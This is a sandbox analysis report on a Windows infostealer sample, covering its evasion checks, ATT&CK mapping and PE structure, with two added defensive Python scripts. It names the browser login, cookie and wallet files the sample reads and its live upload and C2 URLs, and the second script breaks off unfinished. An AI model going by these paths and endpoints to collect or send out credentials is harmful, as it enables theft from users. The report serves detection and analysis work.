Source: vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128520300.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: vk2wTOx91s.exe, 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000003.2118934307.0000000001700000.00000004.00000020.00020000.00000000.sdmp, vk2wTOx91s.exe, 00000000.00000002.2128520300.0000000001700000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWak
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Process information queried: ProcessInformation

        Anti Debugging

Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Thread information set: HideFromDebugger (twice)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | System information queried: KernelDebuggerInformation
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Process queried: DebugPort (twice), DebugObjectHandle (three times)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_000603D0 LoadLibraryW,GetProcAddress
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00066085 mov eax, dword ptr fs:[00000030h] (reads the PEB)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00063D56 mov eax, dword ptr fs:[00000030h] (reads the PEB)

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_00060F25 cpuid
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_0005D570 GetLocaleInfoW
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | Code function: 0_2_0005D330 GetTimeZoneInformation

        Stealing of Sensitive Information

Source: Yara match | File source: 0.2.vk2wTOx91s.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
Source: vk2wTOx91s.exe | String found in binary or memory: \Electrum\wallets
Source: vk2wTOx91s.exe | String found in binary or memory: \ElectronCash\wallets
Source: vk2wTOx91s.exe | String found in binary or memory: \Jaxx
Source: vk2wTOx91s.exe | String found in binary or memory: \Exodus\backup
Source: vk2wTOx91s.exe | String found in binary or memory: \Exodus Eden
Source: vk2wTOx91s.exe | String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\vk2wTOx91s.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
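The file-open list above is the stealer's collection phase in miniature: a single non-browser process reads the Chrome and Edge Login Data, Web Data and Cookies databases, the Firefox cookies.sqlite and key4.db, and carries path strings for Electrum, ElectronCash, Jaxx and Exodus wallet directories. The script below is an added triage rule, not part of the Joe Sandbox report, that classifies file-open events by the store they touch and alerts when a process that does not own the profile reaches two or more store categories. The event lines are constructed (their paths mirror the ones listed above); the event line format, the owning-process image names and the category names are assumptions.

```python
"""Added example: classify file-open events against browser credential stores and
crypto-wallet locations and alert when a process that does not own the profile
reaches several store categories, the way a stealer-triage rule would."""
import re
from collections import defaultdict
from typing import List, Optional, Tuple

# Profile roots and the process that legitimately reads them (assumption: stock image names).
OWNERS = {
    "\\Google\\Chrome\\User Data\\": "chrome.exe",
    "\\Microsoft\\Edge\\User Data\\": "msedge.exe",
    "\\Mozilla\\Firefox\\Profi les\\".replace(" ", ""): "firefox.exe",
}
CHROMIUM = r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
FIREFOX = r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\"
STORE_PATTERNS = [                                   # first match wins; paths mirror the report
    ("browser-logins",  re.compile(CHROMIUM + r"Login Data$", re.I)),
    ("browser-cookies", re.compile(CHROMIUM + r"(Network\\)?Cookies$", re.I)),
    ("browser-webdata", re.compile(CHROMIUM + r"Web Data$", re.I)),
    ("browser-keydb",   re.compile(FIREFOX + r"key4\.db$", re.I)),
    ("browser-cookies", re.compile(FIREFOX + r"cookies\.sqlite$", re.I)),
    ("wallet", re.compile(r"\\(Electrum|ElectronCash)\\wallets(\\|$)|\\Jaxx(\\|$)|"
                          r"\\Exodus\\backup(\\|$)|\\Exodus Eden(\\|$)", re.I)),
]
# Assumed event format: "<time> pid=<n> image=<exe path> open=<file path>"
EVENT_RE = re.compile(r"pid=(?P<pid>\d+)\s+image=(?P<image>.+?)\s+open=(?P<path>.+)$")


def parse_event(line: str) -> Optional[Tuple[int, str, str]]:
    m = EVENT_RE.search(line)
    return (int(m["pid"]), m["image"], m["path"].strip()) if m else None


def classify_path(path: str) -> Optional[str]:
    """Store category for a path, or None when it is not a credential/wallet store."""
    return next((cat for cat, pat in STORE_PATTERNS if pat.search(path)), None)


def legitimate_owner(path: str) -> Optional[str]:
    low = path.lower()
    return next((exe for root, exe in OWNERS.items() if root.lower() in low), None)


def triage(lines: List[str], min_categories: int = 2) -> List[Tuple[int, str, List[str], List[str]]]:
    """(pid, image, categories, paths) for every process that touched at least
    `min_categories` distinct store categories it does not own."""
    hits = defaultdict(lambda: {"image": "", "categories": set(), "paths": []})
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        pid, image, path = ev
        category = classify_path(path)
        if category is None:
            continue
        if legitimate_owner(path) == image.rsplit("\\", 1)[-1].lower():
            continue                                  # a browser reading its own profile is normal
        rec = hits[pid]
        rec["image"] = image
        rec["categories"].add(category)
        rec["paths"].append(path)
    return [(pid, r["image"], sorted(r["categories"]), r["paths"])
            for pid, r in sorted(hits.items()) if len(r["categories"]) >= min_categories]


# Constructed events: the paths are the ones the sample opened plus two benign controls.
SAMPLE_EVENTS = r"""
13:08:43 pid=1204 image=C:\Program Files\Google\Chrome\Application\chrome.exe open=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
13:08:44 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
13:08:44 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
13:08:44 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
13:08:44 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
13:08:44 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
13:08:45 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
13:08:45 pid=3788 image=C:\Users\user\Desktop\vk2wTOx91s.exe open=C:\Users\user\AppData\Roaming\Electrum\wallets\default_wallet
13:08:46 pid=5120 image=C:\Windows\System32\notepad.exe open=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
13:08:46 pid=5120 image=C:\Windows\System32\notepad.exe open=C:\Users\user\Documents\notes.txt
""".strip().splitlines()

if __name__ == "__main__":
    for pid, image, categories, paths in triage(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} {image}: {', '.join(categories)} ({len(paths)} files)")
```

With the constructed events the rule fires once, for PID 3788, which reaches five categories; chrome.exe reading its own Login Data is ignored and notepad.exe, which touches one store, stays below the threshold. The threshold matters because a single access to one store has benign explanations (backup agents, profile migration), whereas one process sweeping Chromium, Firefox and wallet stores within seconds does not.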

        Remote Access Functionality

Source: Yara match | File source: 0.2.vk2wTOx91s.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: vk2wTOx91s.exe PID: 3788, type: MEMORYSTR

MITRE ATT&CK Matrix

Techniques with matching signatures, by tactic. The bracketed numbers are the signature-count badges as rendered in the matrix; the remaining cells of the matrix are its unmatched default entries.

Reconnaissance: none
Resource Development: none
Initial Access: none
Execution: Native API [1]
Persistence: DLL Side-Loading [1]
Privilege Escalation: DLL Side-Loading [1]
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [14]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [2]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [1]; Credential API Hooking [1]
Discovery: System Time Discovery [1]; Security Software Discovery [331]; Virtualization/Sandbox Evasion [14]; Process Discovery [1]; File and Directory Discovery [2]; System Information Discovery [232]
Lateral Movement: none
Collection: Credential API Hooking [1]; Archive Collected Data [1]; Data from Local System [2]
Command and Control: Encrypted Channel [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [112]
Exfiltration: none
Impact: none
Source | Detection | Scanner | Label
vk2wTOx91s.exe | 74% | ReversingLabs | Win32.Adware.RedCap
vk2wTOx91s.exe | 46% | Virustotal |
vk2wTOx91s.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
tztwo2ht.top | 0% | Virustotal |
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
tztwo2ht.top | 0% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://tztwo2ht.top/upload.phpe | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
tztwo2ht.top | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
http://tztwo2ht.top:80/upload.phpMicrosoft | 0% | Avira URL Cloud | safe
http://tztwo2ht.top/ | 0% | Avira URL Cloud | safe
http://tztwo2ht.top/upload.php | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://tztwo2ht.top:80/upload.php | 0% | Avira URL Cloud | safe
https://brewdogebar.com/code.vue | 100% | Avira URL Cloud | malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
http://tztwo2ht.top/ | 0% | Virustotal |
http://tztwo2ht.top/upload.php | 0% | Virustotal |
http://tztwo2ht.top:80/upload.php | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://brewdogebar.com/code.vue | 12% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tztwo2ht.top | 176.113.81.61 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
tztwo2ht.top | true | 0% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://tztwo2ht.top/upload.phpe | vk2wTOx91s.exe, 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tztwo2ht.top:80/upload.phpMicrosoft | vk2wTOx91s.exe memory dumps: 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.2093528924.0000000001700000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.2093562903.0000000001713000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tztwo2ht.top/ | vk2wTOx91s.exe memory dumps: 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tztwo2ht.top/upload.php | vk2wTOx91s.exe memory dumps: 00000000.00000002.2128379629.00000000016D9000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.2128379629.00000000016BE000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.2128379629.00000000016E2000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.2093528924.00000000016F9000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | vk2wTOx91s.exe, 00000000.00000003.2092456123.0000000001937000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tztwo2ht.top:80/upload.php | vk2wTOx91s.exe memory dumps: 00000000.00000003.2118934307.0000000001714000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.2128567322.0000000001714000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://brewdogebar.com/code.vue | vk2wTOx91s.exe (file); vk2wTOx91s.exe, 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp | false | 12% Virustotal; Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.81.61 | tztwo2ht.top | Russian Federation | 9002 | RETN-ASEU | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1472695
        Start date and time:2024-07-13 19:07:54 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 3s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:2
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:vk2wTOx91s.exe
        (renamed file extension from none to exe, renamed because original name is a hash value)
        Original Sample Name:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 77%
        • Number of executed functions: 29
        • Number of non-executed functions: 19
        Cookbook Comments:
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Excluded IPs from analysis (whitelisted): 20.114.59.183
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:08:42 | API Interceptor | 4x Sleep call for process: vk2wTOx91s.exe modified
        No context
        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
RETN-ASEU | https://thuthoock.net/ | malicious | Unknown | 139.45.197.245
RETN-ASEU | https://omnatuor.com:443/iwant-show | malicious | Unknown | 139.45.197.253
RETN-ASEU | NhWAWEhCi7.exe | malicious | LummaC, SmokeLoader | 139.45.197.238
RETN-ASEU | https://rapepush.net/iwant?3.1.525 | malicious | Unknown | 139.45.197.253
RETN-ASEU | http://thampolsi.com/5/7616590 | malicious | Unknown | 139.45.197.236
RETN-ASEU | http://progressivewebappsdev.com | malicious | Unknown | 45.143.94.2
RETN-ASEU | http://www.qualityentertainment.ca/ | malicious | Unknown | 45.143.94.2
RETN-ASEU | http://psaugourtauy.com | malicious | Unknown | 139.45.197.160
RETN-ASEU | http://bouhoagy.net/pfe/current/micro.tag.min.js | malicious | Unknown | 139.45.197.250
RETN-ASEU | https://dibsemey.com | malicious | Unknown | 139.45.197.250
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.992915758963583
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:vk2wTOx91s.exe
        File size:1'949'184 bytes
        MD5:2fbf1fc802ac4b340b1fd7b3e4659974
        SHA1:463182267627d5ce5f3196479820e7bae4d18a52
        SHA256:841963a18fa4b59e093ef658711545638f33c1c1f39c17f61501544e2f41cd2c
        SHA512:9bcc835d04c205feb52eade0cc9261f24537a6d00a6b0c871ed5a55c4b528673b22150661d6f8f40aaab110a90b9915b61d06b77be7a3e9e9beb8937e8e7e43c
        SSDEEP:24576:eBWE5mhcIiOZb57cxfGyZx58WDF5jmOBO6X+N58PPYzgHD8UJ8CgEoO4DvIcGKXP:eBWNyuXUn9BQa3Yzfw4jMK9PYIB
        TLSH:679533BE17871754CE436BB40F4B289E7A02D52BA65E3D4C31448EE9C8C2B34567F936
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.f......................g...................@.......................................@................................
        Icon Hash:2d2e3797b32b2b99
Entrypoint:0xd38580 (RVA 0x938580 from the 0x400000 image base)
Entrypoint Section:.&ZK
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Time Stamp:0x669035EF [Thu Jul 11 19:43:43 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:6
        OS Version Minor:0
        File Version Major:6
        File Version Minor:0
        Subsystem Version Major:6
        Subsystem Version Minor:0
        Import Hash:48d4a6a3111a18b082fa3638b1568f64
        Instruction
        push AA8F3393h
        push E8373891h
        pushfd
        shl byte ptr [esp+04h], 00000067h
        call 00007F2BC1160C96h
        sbb cl, dh
        xlatb
        fcmovnu st(0), st(2)
        mov al, byte ptr [68178A24h]
        jnle 00007F2BC1103802h
        clc
        pop ss
        jbe 00007F2BC1103843h
        cwde
        push ebx
        push es
        sbb byte ptr [edi], bl
        add eax, 7D7C2DBDh
        lodsb
        aaa
        inc edi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x92a740 | 0x50 | .&ZK
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x99e000 | 0x1569 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99d000 | 0x4ec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x99c420 | 0x40 | .&ZK
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7c2000 | 0x2c | .[SL
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b147 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0xe47c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2c000 | 0x66aaf4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.WaG | 0x697000 | 0x12a941 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.[SL | 0x7c2000 | 0x450 | 0x600 | 0b507b8761f6d2fc8d0dcbd0b403c42c | False | 0.03515625 | data | 0.18645303104520436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.&ZK | 0x7c3000 | 0x1d9670 | 0x1d9800 | ebc6afca25dc507333f2dc27289a8298 | False | 0.992732498185058 | data | 7.996151903965326 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x99d000 | 0x4ec | 0x600 | 402872e775174299a30ce0794815f384 | False | 0.626953125 | data | 5.002490132586138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x99e000 | 0x1569 | 0x1600 | a123dcb6afe0a7a58ed9df7a7ed930e0 | False | 0.3318536931818182 | data | 4.310665190840655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x99e18c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.5675675675675675
RT_ICON | 0x99e2b4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | | | 0.4486994219653179
RT_ICON | 0x99e81c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | | | 0.4637096774193548
RT_ICON | 0x99eb04 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.3935018050541516
RT_GROUP_ICON | 0x99f3ac | 0x3e | data | | | 0.8387096774193549
RT_MANIFEST | 0x99f3ec | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | Sleep
KERNEL32.dll | GetSystemTimeAsFileTime
KERNEL32.dll | HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
Language of compilation system | Country where language is spoken
English | United States
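The static tables above are the raw material for the "PE file contains section with special chars" and "Entry point lies outside standard sections" signatures: .text, .rdata, .data and .WaG have a raw size of 0 (their code and data exist only once the packer writes them at run time), the entry point (RVA 0x938580) lies in .&ZK, whose 1.9 MB of raw data has an entropy of 7.996, and the import table names only eight KERNEL32 functions, enough to allocate memory and resolve everything else with LoadLibraryA/GetProcAddress. The script below is an added example, not tooling from the Joe Sandbox report, that parses a PE32 section table with the Python standard library and applies those heuristics. It builds its own sample image from the section table above (the raw data of .&ZK is truncated to 0x1000 pseudo-random bytes and the other raw sections are placeholder bytes, so the computed entropies differ from the report's); the set of standard code-section names and the 7.0 entropy threshold are assumptions.

```python
"""Added example: parse a PE32 section table with the standard library and apply the
packer heuristics the report triggers on (entry point outside the usual code section,
section names with special characters, executable sections with no raw data, high
entropy raw data)."""
import hashlib, math, re, struct
from collections import Counter

CNT_CODE, CNT_INIT_DATA = 0x20, 0x40                             # IMAGE_SCN_CNT_*
MEM_EXECUTE, MEM_READ, MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
FILE_ALIGN = 0x200
STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", ".itext"}    # assumption: usual compiler names
SECTION_NAME_RE = re.compile(r"^\.?[A-Za-z0-9_]+$")

def shannon_entropy(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe(pe: bytes) -> dict:
    """Read the COFF header, AddressOfEntryPoint and every IMAGE_SECTION_HEADER."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    magic, entry = struct.unpack_from("<H", pe, opt)[0], struct.unpack_from("<I", pe, opt + 16)[0]
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        raw = pe[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr, "vsize": vsize,
                         "rawsize": rawsize, "chars": chars, "entropy": shannon_entropy(raw)})
        off += 40
    return {"machine": machine, "pe32plus": magic == 0x20B, "entry_point": entry, "sections": sections}

def section_for_rva(sections, rva):
    return next((s for s in sections if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)

def analyse(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """Parsed header plus a list of (rule, section) findings."""
    hdr = parse_pe(pe)
    findings = []
    ep_sec = section_for_rva(hdr["sections"], hdr["entry_point"])
    if ep_sec is None:
        findings.append(("entry-point-outside-sections", hex(hdr["entry_point"])))
    elif ep_sec["name"] not in STANDARD_CODE_SECTIONS:
        findings.append(("entry-point-nonstandard-section", ep_sec["name"]))
    for s in hdr["sections"]:
        if not SECTION_NAME_RE.match(s["name"]):
            findings.append(("special-chars-name", s["name"]))
        if s["chars"] & MEM_EXECUTE and s["vsize"] and s["rawsize"] == 0:
            findings.append(("virtual-only-exec", s["name"]))      # code that only exists once unpacked in memory
        if s["rawsize"] and s["entropy"] >= entropy_threshold:
            findings.append(("high-entropy", s["name"]))
    hdr["findings"] = findings
    return hdr

def build_pe32(sections, entry_rva: int) -> bytes:
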